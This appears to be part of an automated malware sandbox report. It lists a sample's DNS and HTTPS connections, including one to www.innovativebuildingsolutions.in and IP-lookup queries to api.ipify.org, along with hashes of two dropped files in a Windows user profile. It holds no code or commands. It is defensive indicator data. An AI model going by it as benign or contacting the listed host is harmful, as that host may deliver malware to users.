US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
IN 103.21.58.98:443 www.innovativebuildingsolutions.in tcp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.13.205:443 api.ipify.org tcp
US 8.8.8.8:53 205.13.26.104.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_prbo505p.ofd.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Roaming\Skrmet.Kli

MD5 9916e5a5f7afe8c1f861f93999a875f3
SHA1 8d1f119fcb5942cd8e71f3bb1fc527c2a74549cc
SHA256 97cebd696b9e5587ba0a101e2cdabf9bf01ab268d354408fdc349085760579df
SHA512 30b0c3b929218288998b7578672872d84e5fd810543b77de153033b491b0dd9472ccaa711b448fcbd9ccc9a67888e3439aeea5d1c13b2860f1f480a325a24edc
